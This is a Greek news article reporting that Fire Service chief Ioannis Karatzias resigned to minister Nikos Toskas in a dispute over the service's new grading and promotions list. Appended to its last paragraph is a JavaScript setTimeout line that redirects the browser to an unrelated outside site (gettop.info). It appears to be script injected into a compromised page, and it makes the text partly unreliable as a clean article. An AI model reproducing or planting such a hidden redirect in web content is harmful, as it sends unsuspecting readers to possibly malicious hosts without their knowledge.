Το… βαθμολόγιο ανάγκασε σε παραίτηση τον Αρχηγό του Πυροσβεστικού Σώματος

0
35

 

Την παραίτησή του υπέβαλε ο Αρχηγός του Πυροσβεστικού Σώματος, αντιστράτηγος Ιωάννης Καρατζιάς, με σχετική επιστολή που απέστειλε στον υπουργό Προστασίας του Πολίτη, Νίκο Τόσκα.

Αφού ευχαριστεί τον Πρωθυπουργό για την εμπιστοσύνη που του έδειξε, επικαλείται λόγους αρχών και αξιών που τον οδηγούν στο να παραιτηθεί .

Πληροφορίες αναφέρουν ότι διαφωνούσε με την κατάρτιση του βαθμολογίου της Πυροσβεστικής, το οποίο ισχύει ήδη για την Αστυνομία, αλλά θα εφαρμοζόταν για πρώτη φορά στο Πυροσβεστικό Σώμα.

Σύμφωνα με τις ίδιες πηγές ο αρχηγός της Πυροσβεστικής θεώρησε ότι «καπελώνεται» από το υπουργείο Προστασίας του Πολίτη, όσον αφορά στις προαγωγές και αποδόσεις βαθμών και θεώρησε προτιμότερο να παραιτηθεί.

Στο μεταξύ πριν από λίγες μέρες είχε αποφασιστεί και η μετακίνηση του εκπροσώπου τύπου της Πυροσβεστικής, Νίκου Τσόγκα από τη θέση του, με εντολή από το υπουργείο .

Όπως ανακοινώθηκε από το υπουργείο Προστασίας του Πολίτη, μετά την παραίτηση «θα κινηθούν οι προβλεπόμενες διαδικασίες για την επιλογή νέου Αρχηγού στο Πυροσβεστικό Σώμα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here